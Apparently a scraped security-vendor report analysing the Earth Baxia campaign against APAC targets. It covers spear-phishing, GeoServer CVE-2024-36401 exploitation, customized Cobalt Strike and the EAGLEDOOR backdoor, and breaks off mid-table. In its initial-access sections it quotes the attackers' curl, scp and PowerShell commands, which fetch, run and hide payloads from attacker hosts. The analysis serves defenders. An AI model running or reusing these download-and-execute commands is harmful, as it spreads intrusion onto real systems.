Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/i\/earth-baxia-spear-phishing-and-geoserver-exploit.html\"><br \/>\n<meta property=\"og:title\" content=\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/Header-Earth-Baxia-Spear-Phishing-Exploits.png\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/Header-Earth-Baxia-Spear-Phishing-Exploits.png\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"51.196948255707\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"916857567\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"11.258177570093\">\n<div class=\"article-details\" role=\"heading\" readability=\"42.095794392523\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">APT & Targeted Attacks<\/p>\n<p class=\"article-details__description\">We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.<\/p>\n<p class=\"article-details__author-by\">By: Ted Lee, Cyris\tTseng, Pierre Lee, Sunny Lu, Philip Chen <time class=\"article-details__date\">September 19, 2024<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\">  <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p>   <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"50.735163204748\">\n<div class=\"responsive-table-wrap\" readability=\"46.755934718101\">\n<h4>Summary<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">Threat actor Earth Baxia has targeted a government organization in Taiwan \u2013 and potentially other countries in the Asia-Pacific (APAC) region \u2013 using spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">CVE-2024-36401 is a remote code execution exploit that allowed the threat actors to download or copy malicious components.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The threat actor employs GrimResource and AppDomainManager injection to deploy additional payloads, aiming to lower the victim\u2019s guard.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Customized Cobalt Strike components were deployed on compromised machines through the two initial access vectors. The altered version of Cobalt Strike included modified internal signatures and a changed configuration structure for evasion.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Earth Baxia also used a new backdoor named EAGLEDOOR, which supports multiple communication protocols for information gathering and payload delivery.<\/span><\/li>\n<\/ul>\n<p>In July, we observed suspicious activity targeting a government organization in Taiwan, with other APAC countries also likely targeted, attributed to the threat actor Earth Baxia. In these campaigns, Earth Baxia used spear-phishing emails and exploited <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-36401\" target=\"_blank\" rel=\"noopener\">CVE-2024-36401<\/a>, a vulnerability in an open-source server for sharing geospatial data called GeoServer, as initial access vectors, deploying customized Cobalt Strike components on compromised machines. Additionally, we identified a new backdoor called EAGLEDOOR that supports multiple protocols. In this report, we will discuss their infection chain and provide a detailed analysis of the malware involved.<\/p>\n<h4>Attribution and victimology<\/h4>\n<p>Upon investigation, we discovered that multiple servers were hosted on the Alibaba cloud service or located in Hong Kong, and some related samples were submitted to VirusTotal from China. After checking one of the Cobalt Strike watermarks (666666) used by the threat actors on Shodan, we also found that only a few machines were linked to this watermark, most of which were in China (Table 1). Therefore, we suspect that the APT group behind these campaigns originates from China.<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td width=\"192\" valign=\"top\"><b>Country<\/b><\/td>\n<td width=\"228\" valign=\"top\"><b>Number of machines<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"192\" valign=\"top\">China<\/td>\n<td width=\"228\" valign=\"top\">13<\/td>\n<\/tr>\n<tr>\n<td width=\"192\" valign=\"top\">Japan<\/td>\n<td width=\"228\" valign=\"top\">1<\/td>\n<\/tr>\n<tr>\n<td width=\"192\" valign=\"top\">Singapore<\/td>\n<td width=\"228\" valign=\"top\">1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 1. Machines linked to the Cobalt Strike watermark 666666<\/span><\/center> <\/p>\n<p>Based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand (Figure 1). Notably, we also discovered a decoy document written in simplified Chinese, suggesting that China is also one of the impacted countries. However, due to limited information, we cannot accurately determine which sectors in China are affected.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"d79450\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig01-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig01-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 1. Map chart of impacted regions\"> <\/a> <\/p>\n<p><figcaption>Figure 1. Map chart of impacted regions<\/figcaption><\/p>\n<\/figure><\/div>\n<div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<h4>Infection chain<\/h4>\n<p>In this section, we will discuss the threat group\u2019s attack flow as identified by our telemetry, including the malware and tactics, techniques, and procedures (TTPs) involved, as shown in Figure 2.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"811841\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig02-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig02-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 2. Overview of the attack chain\"> <\/a> <\/p>\n<p><figcaption>Figure 2. Overview of the attack chain<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"51.635240572172\">\n<div class=\"responsive-table-wrap\" readability=\"49.176419592544\">\n<h4>Initial access<\/h4>\n<h5><b>Vulnerable GeoServer<\/b><\/h5>\n<p>In some cases, Earth Baxia leveraged CVE-2024-36401, a remote code execution (RCE) exploit on GeoServer, to execute arbitrary commands: Our investigation revealed that they used commands like \u201ccurl\u201d and \u201cscp\u201d to download or copy malicious components into the victim\u2019s environment, and then executed these components using the RCE exploit (Table 2).<\/p>\n<p>The file download via curl is as follows:<\/p>\n<p><span class=\"blockquote\">curl –connect-timeout 3 -m 10 -o c:\\windows\\temp\\{file name} http:\/\/<b>167[.]172[.]89[.]142<\/b>\/{file name}<\/span><\/p>\n<p>The remote file copy via scp is follows:<\/p>\n<p><span class=\"blockquote\">cmd \/c “scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o UserKnownHostsFile=C:\\windows\\temp\\ t1sc@<b>152[.]42[.]243[.]170<\/b>:\/tmp\/bd\/{file name} c:\\windows\\temp\\”<\/span><\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\" width=\"623\">\n<tbody readability=\"3\">\n<tr>\n<td width=\"111\" valign=\"top\"><b>File name<\/b><\/td>\n<td width=\"512\" valign=\"top\"><b>Description<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"111\" valign=\"top\">Edge.exe<\/td>\n<td width=\"512\" valign=\"top\">Legitimate executable used to load msedge.dll<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"111\" valign=\"top\">msedge.dll<\/td>\n<td width=\"512\" valign=\"top\">Malicious loader (SWORDLDR) used to launch Cobalt Strike (Logs.txt)<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"111\" valign=\"top\">Logs.txt<\/td>\n<td width=\"512\" valign=\"top\">Customized Cobalt Strike shellcode<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 2. The malicious components downloaded by RCE exploit<\/span><\/center> <\/p>\n<h5><b>Spear-phishing email vector<\/b><\/h5>\n<p>In early August, Earth Baxia began leveraging phishing emails to advance their attacks. One of the victims reported receiving over 70 phishing emails within approximately two weeks. We also identified similar email attachments on VirusTotal. Analysis of the decoy documents suggests that the attackers may have targeted not just Taiwan, but also Vietnam and China.<\/p>\n<p>Most of the email subjects are meticulously tailored with varying content; the attached ZIP file contains a decoy MSC file, which we named RIPCOY. At this stage, when the user double-clicks this file, the embedded obfuscated VBScript attempts to download multiple files from a public cloud service, typically Amazon Web Services (AWS) in a technique called <a href=\"https:\/\/www.elastic.co\/security-labs\/grimresource\" target=\"_blank\" rel=\"noopener\">GrimResource<\/a>. These files include a decoy PDF document, .NET applications, and a configuration file.<\/p>\n<p>The .NET applications and configuration file dropped by the MSC file then use a technique known as <a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/014\/\" target=\"_blank\" rel=\"noopener\">AppDomainManager injection<\/a>, which allows the injection of a custom application domain to execute arbitrary code within the process of the target application. It enables the execution of any .NET application to load an arbitrary managed DLL, either locally or remotely from a website, without directly invoking any Windows API calls (Figure 3).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"706480\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig03-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig03-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 3. The configuration file contains download sites loaded by the .NET framework application\"> <\/a> <\/p>\n<p><figcaption>Figure 3. The configuration file contains download sites loaded by the .NET framework application<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>The legitimate .NET applications then proceed to download the next-stage downloader based on the URL specified in the .config file, which points to a .NET DLL file (Figure 4). The URL for this download is obfuscated using Base64 and AES encryption. Most of the download sites identified at this stage were hosted on public cloud services, typically Aliyun. Once the DLL retrieves the shellcode, it executes it using the CreateThread API, with all processes running entirely in memory.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"aaac95\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig04-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig04-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 4. The .NET DLL file contains a download site with obfuscated code\"> <\/a> <\/p>\n<p><figcaption>Figure 4. The .NET DLL file contains a download site with obfuscated code<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>The shellcode gathers information from the affected machine, including the username, computer name, parent process (the legitimate .NET application), and memory status. It appends this information as a \u2018client_id\u2019 parameter to a URL and sends it to a custom domain. It may receive a 64-character response from the server, which is then used to request the next payload from the URL (Figure 5). However, we couldn\u2019t receive the final payload.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"76a6d3\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig05-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig05-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 5. A screenshot of network traffic analysis from the VirusTotal sandbox\"> <\/a> <\/p>\n<p><figcaption>Figure 5. A screenshot of network traffic analysis from the VirusTotal sandbox<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38.5\">\n<div readability=\"22\">\n<p>The shellcode exhibited several distinct features:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">The attacker disguised the domain names to resemble public cloud services by using names like \u201cs3cloud-azure\u201d or \u201cs2cloud-amazon\u201d. Each network request followed a specific pattern, including a unique user-agent string and data formatted in JSON.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The final stage of the download process always had the path \u201c\/api\/v1\/homepage\/\u201d, suggesting that the file might still be hosted on a third-party cloud service.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">By hosting files on the cloud, the attacker gains the advantage of easily replacing or updating files, including .config files with different download links, making it significantly more challenging for us to track their activities.<\/span><\/li>\n<\/ul>\n<p>Although we didn\u2019t confirm what the final shellcode was, our telemetry did reveal that the \u201concesvc.exe\u201d launched by the MSC file would run another process, \u201cEdge.exe\u201d, to load the Cobalt Strike components msedge.dll and Logs.txt. In the next section, we discuss these components further.<\/p>\n<h4>Backdoor analysis<\/h4>\n<h5><b>Cobalt Strike<\/b><\/h5>\n<p>Earth Baxia utilizes DLL side-loading to execute Cobalt Strike shellcode (Figure 6). To evade defenses, the shellcode loader, known as \u201cSWORDLDR,\u201d decrypts the payload and injects it into a specified process according to its embedded configuration (Figure 7). <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"82a7d5\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig06-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig06-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 6. Decrypted shellcode\"> <\/a> <\/p>\n<p><figcaption>Figure 6. Decrypted shellcode<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"7cd064\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig07-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig07-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 7. Execution flow of Cobalt Strike components\"> <\/a> <\/p>\n<p><figcaption>Figure 7. Execution flow of Cobalt Strike components<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>The injected shellcode is a customized version of Cobalt Strike. Unlike the usual Cobalt Strike payload, the modified version\u2019s MZ header has been removed and the internal signatures have been modified (Figure 8). Additionally, the structure of configuration has also been slightly changed (Figure 9). <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6.5\">\n<figure class=\"image-figure\" readability=\"3\"> <a id=\"b3ca5f\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig08-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig08-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 8. Header differences between the usual (left) and modified (right) versions of Cobalt Strike \"> <\/a> <\/p>\n<p><figcaption>Figure 8. Header differences between the usual (left) and modified (right) versions of Cobalt Strike <\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"image\" readability=\"6.5\">\n<figure class=\"image-figure\" readability=\"3\"> <a id=\"068caa\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig09-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig09-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 9. Differences in configuration structures between the usual (left) and modified (right) versions of Cobalt Strike\"> <\/a> <\/p>\n<p><figcaption>Figure 9. Differences in configuration structures between the usual (left) and modified (right) versions of Cobalt Strike<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"40\">\n<div readability=\"25\">\n<h5><b>EAGLEDOOR<\/b><\/h5>\n<p>On the victim side, we collected these sample sets:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Systemsetting.dll (EAGLEDOOR loader)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Systemsetting.exe<\/span><\/li>\n<\/ul>\n<p>These samples are components of EAGLEDOOR, which was dropped and launched by the Cobalt Strike process mentioned previously.<\/p>\n<p>The threat actors apply DLL side-loading to start the loader and execute EAGLEDOOR in memory. In the loader, there are two DLL files encrypted in the .data section:<\/p>\n<p><b>Hook.dll<\/b><\/p>\n<p>This is the module for hooking the specific API with export function, MyCreateHook, to hook the APIs which are frequently called (Figure 10). Once the hooked API is called, the malicious module, Eagle.dll, will be executed.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"7\">\n<figure class=\"image-figure\" readability=\"4\"> <a id=\"b87c96\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig10-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig10-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 10. Loader applies hook.dll to hook the APIs, GetProcAddress, FreeLibrary and LdrUnloadDll\"> <\/a> <\/p>\n<p><figcaption>Figure 10. Loader applies hook.dll to hook the APIs, GetProcAddress, FreeLibrary and LdrUnloadDll<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p><b>Eagle.dll<\/b><\/p>\n<p>The code flow of launching Eagle.dll is shown below. The loader decrypts this module and executes the first export function \u201cRunEagle\u201d in the memory (Figure 11). <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"3b803c\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig11-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig11-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 11. The code flow to start Eagle.dll in the loader\"> <\/a> <\/p>\n<p><figcaption>Figure 11. The code flow to start Eagle.dll in the loader<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"42\">\n<div readability=\"29\">\n<p>EAGLEDOOR supports four methods to communicate with a C&C server:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">DNS<\/span><\/li>\n<li><span class=\"rte-red-bullet\">HTTP<\/span><\/li>\n<li><span class=\"rte-red-bullet\">TCP<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Telegram<\/span><\/li>\n<\/ul>\n<p>Upon analysis, TCP, HTTP and DNS protocol are utilized to send the victim machine\u2019s status to a C&C server. The main backdoor functionality is achieved by Telegram protocol through the Bot API, and the applied methods include:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">getFile<\/span><\/li>\n<li><span class=\"rte-red-bullet\">getUpdates<\/span><\/li>\n<li><span class=\"rte-red-bullet\">sendDocument<\/span><\/li>\n<li><span class=\"rte-red-bullet\">sendMessage<\/span><\/li>\n<\/ul>\n<p>These methods are effective for gathering information, delivering files, and executing the next payload on the victim’s system. However, in this case, we only collected samples related to TCP and HTTP protocols on the victim side. Therefore, we will keep monitoring the channel to track the threat actors’ next steps in their Telegram communications.<\/p>\n<h4>Exfiltration<\/h4>\n<p>Based on our investigation, we observed that Earth Baxia would archive the collected data and exfiltrate stolen data by using curl.exe. Figure 12 shows a case of data exfiltration to their file server (152[.]42[.]243[.]170) through curl.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"b071c0\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig12-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig12-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 12. The process for exfiltration by curl.exe\"> <\/a> <\/p>\n<p><figcaption>Figure 12. The process for exfiltration by curl.exe<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<h4>Further observations<\/h4>\n<p>Most phishing emails lure users with an attachment. However, based on our telemetry, some phishing emails are sent with a phishing link that downloads a ZIP file. So far, we know there are four combinations at the initial access stage, as shown in Figure 13. Both MSC file and LNK file are able to deliver those two toolsets.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"60b435\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig13-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig13-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 13. The combinations we know at initial access\"> <\/a> <\/p>\n<p><figcaption>Figure 13. The combinations we know at initial access<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38\">\n<div class=\"responsive-table-wrap\" readability=\"21\">\n<p>While investigating the case, we came across the download site static[.]krislab[.]site in an LNK file. It executes a PowerShell command to download decoy documents and Cobalt Strike toolsets, which include Edge.exe, msedge.dll, and Logs.txt (Table 3). This toolset is similar to the one we mentioned earlier in this blog entry.<\/p>\n<p>Each zip file contains a LNK file with the target PowerShell command:<\/p>\n<p><span class=\"blockquote\">wget -Uri https:\/\/static.krislab.site\/infodata\/<b>msedge.dll<\/b> -OutFile C:\\Users\\Public\\msedge.dll; wget -Uri http s:\/\/static.krislab.site\/infodata\/<b>Logs.txt<\/b> -OutFile C:\\Users\\Public\\Logs.txt;wget -Uri https:\/\/static.krislab.site\/infoda ta\/<b>Edge.exe<\/b> -OutFile C:\\Users\\Public\\Edge.exe;C:\\Users\\Public\\Edge.exe;wget -Uri “https:\/\/static.krislab.site\/infodata\/<b>yn.pdf<\/b>” -OutFile “C:\\Users\\Public\\\u9080\u8acb\u51fd.pdf”;C:\\Windows\\System32\\cmd.exe \/c start \/b “C:\\Users\\Public\\\u9080\u8acb\u51fd.pdf”;attrib +s +h C:\\Users\\Public\\Edge.exe;attrib +s +h C:\\Users\\Public\\Logs.txt;attrib +s +h C:\\Users\\Public\\msedge.dll<\/span><\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"3\">\n<tr>\n<td width=\"141\" valign=\"top\"><b>Discovered Date<\/b><\/td>\n<td width=\"275\" valign=\"top\"><b>Path<\/b><\/td>\n<td width=\"208\" valign=\"top\"><b>File description<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"141\" rowspan=\"5\" valign=\"top\">June 21, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/Invitation1017.zip<\/td>\n<td width=\"208\" rowspan=\"4\" valign=\"top\">Cobalt Strike tool set<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Edge.exe<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/msedge.dll<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Logs.txt<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/tw.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<tr>\n<td width=\"141\" valign=\"top\">June 25, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/break_1\/06.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"141\" rowspan=\"5\" 